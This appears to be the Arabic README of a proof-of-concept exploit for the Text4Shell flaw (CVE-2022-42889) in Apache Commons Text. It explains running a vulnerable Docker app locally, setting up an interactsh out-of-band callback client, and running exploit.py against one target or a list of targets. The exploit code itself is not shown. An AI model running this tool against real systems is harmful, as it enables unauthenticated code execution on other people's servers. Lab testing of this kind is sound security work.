
CVE-2022-42889 - استغلال Text4Shell
هذا هو إثبات مفهوم (PoC) لاستغلال الثغرة الأمنية في Apache Commons Text [CVE-2022-42889]
الإصدارات الضعيفة: من 1.5.0 إلى (وليس بما في ذلك) 1.10.0
الاستغلال الناجح لهذه الثغرة يسمح لمهاجم غير مصادق بتنفيذ تعليمات برمجية عشوائية على الأصول الضعيفة.
التطبيق الذي طوره @securekomodo مرفق هنا.
يمكن أيضًا تحميل هذا التطبيق من سجل Docker
docker run -p 8080:8080 gokul2/text4shell-poc:latest
سيكون التطبيق متاحًا الآن على localhost:8080.
للتحقق من تنفيذ الأوامر العشوائي، نستخدم interactsh، وهي أداة لالتقاط التفاعلات خارج النطاق (OOB) من @projectdiscovery.
قم بإعداد عميل Interactsh قبل تنفيذ الاستغلال الفعلي.
docker run projectdiscovery/interactsh-client:latest
قم بتدوين النطاق المدرج بعد بدء التطبيق
[INF] Listing 1 payload for OOB Testing
[INF] xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.oast.pro
python3 exploit.py -u [host] -i [input-file-with-targets] -v [interactsh client domain] -p [proxy(optional)]
python3 exploit.py -u [host] -t [single target path] -v [interactsh client domain] -p [proxy(optional)]
تحقق من السجلات في عميل Interactsh للتحقق من الاستغلال.